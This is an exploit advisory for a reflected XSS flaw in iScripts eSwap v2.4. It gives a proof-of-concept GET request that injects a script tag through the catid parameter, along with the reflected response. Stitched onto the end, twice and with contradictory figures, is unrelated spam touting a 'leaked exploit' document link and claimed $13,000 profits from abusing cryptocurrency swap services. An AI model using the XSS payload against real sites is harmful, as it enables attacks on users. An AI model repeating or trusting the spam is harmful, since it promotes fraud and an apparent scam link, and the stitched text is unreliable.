CVE-2018-10135

# Exploit title: iScripts eSwap v2.4 - Reflected XSS User Panel
# Date: 16/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Software Link: https://www.iscripts.com/eswap
# Demo Link: https://www.demo.iscripts.com/eswap/demo//index.php
# Version: 2.4
# CVE: Pending...
# Tested on: Windows 10 / Kali Linux
# Category: Webapps


#1. Description
-----------------------------------------------------
iScripts eSwap v2.4 has Reflected XSS via the "catwiseproducts.php" function "search" parameter in User Panel.

#2. PoC
-----------------------------------------------------
Request:

GET /eswap/demo//catwiseproducts.php?catid=%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E HTTP/1.1
Host: www.demo.iscripts.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=227100805.298811387.1522637403.1523506103.1523861118.10; __utmz=227100805.1522637403.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; __utma=129714457.1603653646.1523416273.1523433224.1523861782.3; __utmz=129714457.1523433224.2.2.utmcsr=iscripts.com|utmccn=(referral)|utmcmd=referral|utmcct=/supportdesk/demo.php; __utmb=227100805; __utmc=227100805; hs-messages-is-open=false; PHPSESSID=54e6027b90654e06b5e907e34b24361e; __utmb=129714457.3.10.1523861782; __utmc=129714457
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Response:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 07:08:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 30459
...
action="catwiseproducts.php" method="POST" role="form">
<input name="catid" type="hidden" id="catid" VALUE=""><script>alert('1')</script>">
<input type="hidden" name="cmbItemType" id="cmbItemType" value="">
...
✅ Leaked Exploit Documentation:

https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing

This made me $13,000 in 2 days.

Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.

Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from Swapzone — instant swap).
✅ Leaked Exploit Documentation:

https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing

This made me $13,000 in 2 days.

Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.

Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).